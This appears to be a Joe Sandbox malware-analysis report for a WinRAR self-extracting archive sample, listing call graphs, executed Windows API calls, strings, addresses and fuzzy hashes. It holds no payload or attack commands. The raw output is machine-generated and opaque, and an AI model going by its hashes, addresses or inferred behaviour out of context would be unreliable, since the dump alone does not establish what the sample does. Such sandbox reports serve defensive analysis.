24917 59dbde 2 API calls 24913->24917 24919 59dfbc 24917->24919 24918 5990b7 8 API calls 24920 59e0aa DialogBoxParamW 24918->24920 24919->24912 24921 59e0e4 24920->24921 24922 59e0fd 24921->24922 24923 59e0f6 Sleep 24921->24923 24926 59e10b 24922->24926 25140 59ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24922->25140 24923->24922 24925 59e12a DeleteObject 24927 59e13f DeleteObject 24925->24927 24928 59e146 24925->24928 24926->24925 24927->24928 24929 59e189 24928->24929 24930 59e177 24928->24930 25137 59ac7c 24929->25137 25141 59dc3b 6 API calls 24930->25141 24932 59e17d CloseHandle 24932->24929 24934 59e1c3 24939 59f993 GetModuleHandleW 24934->24939 25271 5a7cd5 24935->25271 24938->24853 24939->24863 24940->24865 24941->24868 24942->24843 24944->24872 24957 5a3b07 24945->24957 24949 5a2a7a 24949->24874 24950 5a2a6f 24950->24949 24971 5a3b43 DeleteCriticalSection 24950->24971 24952 5a2a67 24952->24874 25000 5ac05a 24953->25000 24956 5a2a7d 7 API calls 2 library calls 24956->24875 24960 5a3b10 24957->24960 24959 5a3b39 24977 5a3b43 DeleteCriticalSection 24959->24977 24960->24959 24962 5a2a63 24960->24962 24972 5a3d46 24960->24972 24962->24952 24963 5a2b8c 24962->24963 24993 5a3c57 24963->24993 24966 5a2ba1 24966->24950 24968 5a2baf 24969 5a2bbc 24968->24969 24999 5a2bbf 6 API calls ___vcrt_FlsFree 24968->24999 24969->24950 24971->24952 24978 5a3c0d 24972->24978 24975 5a3d7e InitializeCriticalSectionAndSpinCount 24976 5a3d69 24975->24976 24976->24960 24977->24962 24979 5a3c26 24978->24979 24980 5a3c4f 24978->24980 24979->24980 24985 5a3b72 24979->24985 24980->24975 24980->24976 24983 5a3c3b GetProcAddress 24983->24980 24984 5a3c49 24983->24984 24984->24980 24991 5a3b7e ___vcrt_FlsSetValue 24985->24991 24986 5a3bf3 24986->24980 24986->24983 24987 5a3b95 LoadLibraryExW 24988 5a3bfa 24987->24988 24989 5a3bb3 GetLastError 24987->24989 24988->24986 24990 5a3c02 FreeLibrary 24988->24990 24989->24991 24990->24986 24991->24986 24991->24987 24992 5a3bd5 LoadLibraryExW 24991->24992 24992->24988 24992->24991 24994 5a3c0d ___vcrt_FlsSetValue 5 API calls 24993->24994 24995 5a3c71 24994->24995 24996 5a3c8a TlsAlloc 24995->24996 24997 5a2b96 24995->24997 24997->24966 24998 5a3d08 6 API calls ___vcrt_FlsSetValue 24997->24998 24998->24968 24999->24966 25003 5ac077 25000->25003 25004 5ac073 25000->25004 25001 59fbbc _ValidateLocalCookies 5 API calls 25002 59eefe 25001->25002 25002->24878 25002->24956 25003->25004 25006 5aa6a0 25003->25006 25004->25001 25007 5aa6ac ___scrt_is_nonwritable_in_current_image 25006->25007 25018 5aac31 EnterCriticalSection 25007->25018 25009 5aa6b3 25019 5ac528 25009->25019 25011 5aa6c2 25012 5aa6d1 25011->25012 25032 5aa529 29 API calls 25011->25032 25034 5aa6ed LeaveCriticalSection _abort 25012->25034 25015 5aa6cc 25033 5aa5df GetStdHandle GetFileType 25015->25033 25016 5aa6e2 _abort 25016->25003 25018->25009 25020 5ac534 ___scrt_is_nonwritable_in_current_image 25019->25020 25021 5ac558 25020->25021 25022 5ac541 25020->25022 25035 5aac31 EnterCriticalSection 25021->25035 25043 5a91a8 20 API calls __dosmaperr 25022->25043 25025 5ac546 25044 5a9087 26 API calls ___std_exception_copy 25025->25044 25027 5ac550 _abort 25027->25011 25028 5ac590 25045 5ac5b7 LeaveCriticalSection _abort 25028->25045 25030 5ac564 25030->25028 25036 5ac479 25030->25036 25032->25015 25033->25012 25034->25016 25035->25030 25037 5ab136 _unexpected 20 API calls 25036->25037 25038 5ac48b 25037->25038 25040 5aaf0a 11 API calls 25038->25040 25042 5ac498 25038->25042 25039 5a8dcc _free 20 API calls 25041 5ac4ea 25039->25041 25040->25038 25041->25030 25042->25039 25043->25025 25044->25027 25045->25027 25047 59ec50 25046->25047 25048 59086d GetModuleHandleW 25047->25048 25049 590888 GetProcAddress 25048->25049 25050 5908e7 25048->25050 25052 5908b9 GetProcAddress 25049->25052 25053 5908a1 25049->25053 25051 590c14 GetModuleFileNameW 25050->25051 25151 5a75fb 42 API calls 2 library calls 25050->25151 25062 590c32 25051->25062 25054 5908cb 25052->25054 25053->25052 25054->25050 25056 590b54 25056->25051 25057 590b5f GetModuleFileNameW CreateFileW 25056->25057 25058 590c08 CloseHandle 25057->25058 25059 590b8f SetFilePointer 25057->25059 25058->25051 25059->25058 25060 590b9d ReadFile 25059->25060 25060->25058 25064 590bbb 25060->25064 25065 590c94 GetFileAttributesW 25062->25065 25067 590c5d CompareStringW 25062->25067 25068 590cac 25062->25068 25142 58b146 25062->25142 25145 59081b 25062->25145 25064->25058 25066 59081b 2 API calls 25064->25066 25065->25062 25065->25068 25066->25064 25067->25062 25069 590cb7 25068->25069 25071 590cec 25068->25071 25072 590cd0 GetFileAttributesW 25069->25072 25074 590ce8 25069->25074 25070 590dfb 25094 59a64d GetCurrentDirectoryW 25070->25094 25071->25070 25073 58b146 GetVersionExW 25071->25073 25072->25069 25072->25074 25075 590d06 25073->25075 25074->25071 25076 590d0d 25075->25076 25077 590d73 25075->25077 25079 59081b 2 API calls 25076->25079 25078 584092 _swprintf 51 API calls 25077->25078 25080 590d9b AllocConsole 25078->25080 25081 590d17 25079->25081 25082 590da8 GetCurrentProcessId AttachConsole 25080->25082 25083 590df3 ExitProcess 25080->25083 25084 59081b 2 API calls 25081->25084 25152 5a3e13 25082->25152 25086 590d21 25084->25086 25088 58e617 53 API calls 25086->25088 25087 590dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25087->25083 25089 590d3c 25088->25089 25090 584092 _swprintf 51 API calls 25089->25090 25091 590d4f 25090->25091 25092 58e617 53 API calls 25091->25092 25093 590d5e 25092->25093 25093->25083 25094->24894 25096 59081b 2 API calls 25095->25096 25097 59ac2a OleInitialize 25096->25097 25098 59ac4d GdiplusStartup SHGetMalloc 25097->25098 25098->24896 25102 59c5ce 25099->25102 25100 59c6e4 25100->24905 25100->24906 25101 591fac CharUpperW 25101->25102 25102->25100 25102->25101 25154 58f3fa 82 API calls 2 library calls 25102->25154 25105 59ec50 25104->25105 25106 59dbeb SetEnvironmentVariableW 25105->25106 25107 59dc0e 25106->25107 25108 59dc36 25107->25108 25109 59dc2a SetEnvironmentVariableW 25107->25109 25108->24899 25109->25108 25111 59b70b GetObjectW 25110->25111 25112 59b6fe 25110->25112 25114 59b71a 25111->25114 25155 59a6c2 FindResourceW 25112->25155 25116 59a5c6 4 API calls 25114->25116 25117 59b72d 25116->25117 25118 59b770 25117->25118 25119 59b74c 25117->25119 25120 59a6c2 12 API calls 25117->25120 25129 58da42 25118->25129 25169 59a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25119->25169 25122 59b73d 25120->25122 25122->25119 25124 59b743 DeleteObject 25122->25124 25123 59b754 25170 59a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25123->25170 25124->25119 25126 59b75d 25171 59a80c 8 API calls 25126->25171 25128 59b764 DeleteObject 25128->25118 25180 58da67 25129->25180 25134 5990b7 25135 59eb38 8 API calls 25134->25135 25136 5990d6 25135->25136 25136->24918 25138 59acab GdiplusShutdown CoUninitialize 25137->25138 25138->24934 25140->24926 25141->24932 25143 58b15a GetVersionExW 25142->25143 25144 58b196 25142->25144 25143->25144 25144->25062 25146 59ec50 25145->25146 25147 590828 GetSystemDirectoryW 25146->25147 25148 59085e 25147->25148 25149 590840 25147->25149 25148->25062 25150 590851 LoadLibraryW 25149->25150 25150->25148 25151->25056 25153 5a3e1b 25152->25153 25153->25087 25153->25153 25154->25102 25156 59a7d3 25155->25156 25157 59a6e5 SizeofResource 25155->25157 25156->25111 25156->25114 25157->25156 25158 59a6fc LoadResource 25157->25158 25158->25156 25159 59a711 LockResource 25158->25159 25159->25156 25160 59a722 GlobalAlloc 25159->25160 25160->25156 25161 59a73d GlobalLock 25160->25161 25162 59a7cc GlobalFree 25161->25162 25163 59a74c __InternalCxxFrameHandler 25161->25163 25162->25156 25164 59a7c5 GlobalUnlock 25163->25164 25172 59a626 GdipAlloc 25163->25172 25164->25162 25167 59a79a GdipCreateHBITMAPFromBitmap 25168 59a7b0 25167->25168 25168->25164 25169->25123 25170->25126 25171->25128 25173 59a638 25172->25173 25175 59a645 25172->25175 25176 59a3b9 25173->25176 25175->25164 25175->25167 25175->25168 25177 59a3da GdipCreateBitmapFromStreamICM 25176->25177 25178 59a3e1 GdipCreateBitmapFromStream 25176->25178 25179 59a3e6 25177->25179 25178->25179 25179->25175 25181 58da75 _wcschr __EH_prolog 25180->25181 25182 58daa4 GetModuleFileNameW 25181->25182 25183 58dad5 25181->25183 25184 58dabe 25182->25184 25226 5898e0 25183->25226 25184->25183 25186 58db31 25237 5a6310 25186->25237 25187 58959a 80 API calls 25189 58da4e 25187->25189 25188 58e261 78 API calls 25191 58db05 25188->25191 25224 58e29e GetModuleHandleW FindResourceW 25189->25224 25191->25186 25191->25188 25204 58dd4a 25191->25204 25192 58db44 25193 5a6310 26 API calls 25192->25193 25201 58db56 ___vcrt_FlsSetValue 25193->25201 25194 58dc85 25194->25204 25257 589d70 81 API calls 25194->25257 25196 589e80 79 API calls 25196->25201 25198 58dc9f ___std_exception_copy 25199 589bd0 82 API calls 25198->25199 25198->25204 25202 58dcc8 ___std_exception_copy 25199->25202 25201->25194 25201->25196 25201->25204 25251 589bd0 25201->25251 25256 589d70 81 API calls 25201->25256 25202->25204 25209 58dcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25202->25209 25258 591b84 MultiByteToWideChar 25202->25258 25204->25187 25205 58e159 25217 58e1de 25205->25217 25264 5a8cce 26 API calls ___std_exception_copy 25205->25264 25207 58e16e 25265 5a7625 26 API calls ___std_exception_copy 25207->25265 25209->25204 25209->25205 25220 591da7 WideCharToMultiByte 25209->25220 25259 58e5b1 50 API calls __vsnprintf 25209->25259 25260 5a6159 26 API calls 3 library calls 25209->25260 25261 5a8cce 26 API calls ___std_exception_copy 25209->25261 25262 5a7625 26 API calls ___std_exception_copy 25209->25262 25263 58e27c 78 API calls 25209->25263 25211 58e1c6 25266 58e27c 78 API calls 25211->25266 25212 58e214 25215 5a6310 26 API calls 25212->25215 25214 58e261 78 API calls 25214->25217 25216 58e22d 25215->25216 25218 5a6310 26 API calls 25216->25218 25217->25212 25217->25214 25218->25204 25220->25209 25225 58da55 25224->25225 25225->25134 25227 5898ea 25226->25227 25228 58994b CreateFileW 25227->25228 25229 58996c GetLastError 25228->25229 25232 5899bb 25228->25232 25230 58bb03 GetCurrentDirectoryW 25229->25230 25231 58998c 25230->25231 25231->25232 25233 589990 CreateFileW GetLastError 25231->25233 25234 5899ff 25232->25234 25236 5899e5 SetFileTime 25232->25236 25233->25232 25235 5899b5 25233->25235 25234->25191 25235->25232 25236->25234 25238 5a6349 25237->25238 25239 5a634d 25238->25239 25250 5a6375 25238->25250 25267 5a91a8 20 API calls __dosmaperr 25239->25267 25241 5a6699 25244 59fbbc _ValidateLocalCookies 5 API calls 25241->25244 25242 5a6352 25268 5a9087 26 API calls ___std_exception_copy 25242->25268 25246 5a66a6 25244->25246 25245 5a635d 25247 59fbbc _ValidateLocalCookies 5 API calls 25245->25247 25246->25192 25248 5a6369 25247->25248 25248->25192 25250->25241 25269 5a6230 5 API calls _ValidateLocalCookies 25250->25269 25252 589bdc 25251->25252 25253 589be3 25251->25253 25252->25201 25253->25252 25255 589785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25253->25255 25270 586d1a 77 API calls 25253->25270 25255->25253 25256->25201 25257->25198 25258->25209 25259->25209 25260->25209 25261->25209 25262->25209 25263->25209 25264->25207 25265->25211 25266->25217 25267->25242 25268->25245 25269->25250 25270->25253 25272 5a7ce1 _unexpected 25271->25272 25273 5a7cfa 25272->25273 25274 5a7ce8 25272->25274 25295 5aac31 EnterCriticalSection 25273->25295 25307 5a7e2f GetModuleHandleW 25274->25307 25277 5a7ced 25277->25273 25308 5a7e73 GetModuleHandleExW 25277->25308 25281 5a7d76 25290 5a8a91 _abort 5 API calls 25281->25290 25292 5a7d8e 25281->25292 25283 5a7d01 25283->25281 25293 5a7d9f 25283->25293 25316 5a87e0 20 API calls _abort 25283->25316 25284 5a7de8 25317 5b2390 5 API calls _ValidateLocalCookies 25284->25317 25285 5a7dbc 25299 5a7dee 25285->25299 25286 5a8a91 _abort 5 API calls 25286->25293 25290->25292 25292->25286 25296 5a7ddf 25293->25296 25295->25283 25318 5aac81 LeaveCriticalSection 25296->25318 25298 5a7db8 25298->25284 25298->25285 25319 5ab076 25299->25319 25302 5a7e1c 25304 5a7e73 _abort 8 API calls 25302->25304 25303 5a7dfc GetPEB 25303->25302 25305 5a7e0c GetCurrentProcess TerminateProcess 25303->25305 25306 5a7e24 ExitProcess 25304->25306 25305->25302 25307->25277 25309 5a7e9d GetProcAddress 25308->25309 25310 5a7ec0 25308->25310 25314 5a7eb2 25309->25314 25311 5a7ecf 25310->25311 25312 5a7ec6 FreeLibrary 25310->25312 25313 59fbbc _ValidateLocalCookies 5 API calls 25311->25313 25312->25311 25315 5a7cf9 25313->25315 25314->25310 25315->25273 25316->25281 25318->25298 25320 5ab09b 25319->25320 25324 5ab091 25319->25324 25321 5aac98 _unexpected 5 API calls 25320->25321 25321->25324 25322 59fbbc _ValidateLocalCookies 5 API calls 25323 5a7df8 25322->25323 25323->25302 25323->25303 25324->25322 25430 586faa 111 API calls 3 library calls 25363 59dca1 DialogBoxParamW 25431 59f3a0 27 API calls 25366 5aa4a0 71 API calls _free 25367 5b08a0 IsProcessorFeaturePresent 25393 59eda7 48 API calls _unexpected

                                                                                                                    Executed Functions

                                                                                                                    Function 0059DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00590863: GetModuleHandleW.KERNEL32(kernel32), ref: 0059087C
                                                                                                                      • Part of subcall function 00590863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0059088E
                                                                                                                      • Part of subcall function 00590863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005908BF
                                                                                                                      • Part of subcall function 0059A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0059A655
                                                                                                                      • Part of subcall function 0059AC16: OleInitialize.OLE32(00000000), ref: 0059AC2F
                                                                                                                      • Part of subcall function 0059AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0059AC66
                                                                                                                      • Part of subcall function 0059AC16: SHGetMalloc.SHELL32(005C8438), ref: 0059AC70
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0059DF5C
                                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0059DF83
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0059DF94
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0059DFCE
                                                                                                                      • Part of subcall function 0059DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0059DBF4
                                                                                                                      • Part of subcall function 0059DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0059DC30
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0059DFD7
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,005DEC90,00000800), ref: 0059DFF2
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,005DEC90), ref: 0059DFFE
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0059E009
                                                                                                                    • _swprintf.LIBCMT ref: 0059E048
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0059E05A
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0059E061
                                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0059E078
                                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0059E0C9
                                                                                                                    • Sleep.KERNEL32(?), ref: 0059E0F7
                                                                                                                    • DeleteObject.GDI32 ref: 0059E130
                                                                                                                    • DeleteObject.GDI32(?), ref: 0059E140
                                                                                                                    • CloseHandle.KERNEL32 ref: 0059E183
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz]
                                                                                                                    • API String ID: 3049964643-1100332339
                                                                                                                    • Opcode ID: 81b58a26d0439dd08896e5f2c45738d7d600a2ffaa72d8953324947f18d8308e
                                                                                                                    • Instruction ID: ee9bb469d9232dcb91ee5c77ea1fcbd1db0b42cd5e5878cd162a90e4d76b2ae9
                                                                                                                    • Opcode Fuzzy Hash: 81b58a26d0439dd08896e5f2c45738d7d600a2ffaa72d8953324947f18d8308e
                                                                                                                    • Instruction Fuzzy Hash: FB61D771504245AFDB20AB64DC4EF6B3FECBB99704F04042BF945A62A1EA74AD08E771
                                                                                                                    Function 0059A6C2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100memorywindowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 802 59a6c2-59a6df FindResourceW 803 59a7db 802->803 804 59a6e5-59a6f6 SizeofResource 802->804 805 59a7dd-59a7e1 803->805 804->803 806 59a6fc-59a70b LoadResource 804->806 806->803 807 59a711-59a71c LockResource 806->807 807->803 808 59a722-59a737 GlobalAlloc 807->808 809 59a73d-59a746 GlobalLock 808->809 810 59a7d3-59a7d9 808->810 811 59a7cc-59a7cd GlobalFree 809->811 812 59a74c-59a76a call 5a0320 809->812 810->805 811->810 816 59a76c-59a78e call 59a626 812->816 817 59a7c5-59a7c6 GlobalUnlock 812->817 816->817 822 59a790-59a798 816->822 817->811 823 59a79a-59a7ae GdipCreateHBITMAPFromBitmap 822->823 824 59a7b3-59a7c1 822->824 823->824 825 59a7b0 823->825 824->817 825->824
                                                                                                                    APIs
                                                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0059B73D,00000066), ref: 0059A6D5
                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0059B73D,00000066), ref: 0059A6EC
                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0059B73D,00000066), ref: 0059A703
                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0059B73D,00000066), ref: 0059A712
                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0059B73D,00000066), ref: 0059A72D
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0059A73E
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0059A762
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0059A7C6
                                                                                                                      • Part of subcall function 0059A626: GdipAlloc.GDIPLUS(00000010), ref: 0059A62C
                                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0059A7A7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0059A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                    • String ID: FjunY$PNG
                                                                                                                    • API String ID: 211097158-2413478085
                                                                                                                    • Opcode ID: 924a352e50ffb8579f51c703735eda7ddbee21d482c5c5225bfd324d61fa46a4
                                                                                                                    • Instruction ID: 4637c3c233f9c569f79b06f101fb89e05ab0f91652bf6ed5836c8f7069ac2595
                                                                                                                    • Opcode Fuzzy Hash: 924a352e50ffb8579f51c703735eda7ddbee21d482c5c5225bfd324d61fa46a4
                                                                                                                    • Instruction Fuzzy Hash: 40318F75600702AFDB109F61DC89D1BBFBDFF95750B000619F805A6221EB31E848EBA1
                                                                                                                    Function 0058A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1032 58a69b-58a6bf call 59ec50 1035 58a6c1-58a6ce FindFirstFileW 1032->1035 1036 58a727-58a730 FindNextFileW 1032->1036 1037 58a6d0-58a6e2 call 58bb03 1035->1037 1038 58a742-58a7ff call 590602 call 58c310 call 5915da * 3 1035->1038 1036->1038 1039 58a732-58a740 GetLastError 1036->1039 1047 58a6fe-58a707 GetLastError 1037->1047 1048 58a6e4-58a6fc FindFirstFileW 1037->1048 1045 58a804-58a811 1038->1045 1040 58a719-58a722 1039->1040 1040->1045 1050 58a709-58a70c 1047->1050 1051 58a717 1047->1051 1048->1038 1048->1047 1050->1051 1053 58a70e-58a711 1050->1053 1051->1040 1053->1051 1055 58a713-58a715 1053->1055 1055->1040
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A6C4
                                                                                                                      • Part of subcall function 0058BB03: _wcslen.LIBCMT ref: 0058BB27
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A6F2
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A6FE
                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A728
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0058A592,000000FF,?,?), ref: 0058A734
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 42610566-0
                                                                                                                    • Opcode ID: 292a15516eb84a5c0fa094d434ddeb2e60a8d00815c15fcf50882f3ca610bd1c
                                                                                                                    • Instruction ID: a23117fa3fe31c68876550cc3370895522ce1356dbd050b55785fb324b690dfc
                                                                                                                    • Opcode Fuzzy Hash: 292a15516eb84a5c0fa094d434ddeb2e60a8d00815c15fcf50882f3ca610bd1c
                                                                                                                    • Instruction Fuzzy Hash: E741A372900519ABCB25EF64CC88AE9BBB8FF48350F104296F95EE3200D7346E94DF90
                                                                                                                    Function 005A7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,005A7DC4,00000000,005BC300,0000000C,005A7F1B,00000000,00000002,00000000), ref: 005A7E0F
                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,005A7DC4,00000000,005BC300,0000000C,005A7F1B,00000000,00000002,00000000), ref: 005A7E16
                                                                                                                    • ExitProcess.KERNEL32 ref: 005A7E28
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    • Opcode ID: e1f406f8187be7fd9b73cb46187cb5fe166549f240793b586c99a441385a5327
                                                                                                                    • Instruction ID: b8343a0540d874b8f4df004b7da027e394a0cb3db33c6196f5989ba84085715d
                                                                                                                    • Opcode Fuzzy Hash: e1f406f8187be7fd9b73cb46187cb5fe166549f240793b586c99a441385a5327
                                                                                                                    • Instruction Fuzzy Hash: 35E0923200454CABCB516F64DD0DA4A7FAEBF65341F004594F819AA132DB36EE96DA90
                                                                                                                    Function 0058848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 96c927a76f755a2cf553ca8c8ab4a834eed51a298e350ccf7e61611b6ff34816
                                                                                                                    • Instruction ID: 3969de0b9775e4e56ce9b5d03cd1602834d168e305add0e666b70fe16b5871f0
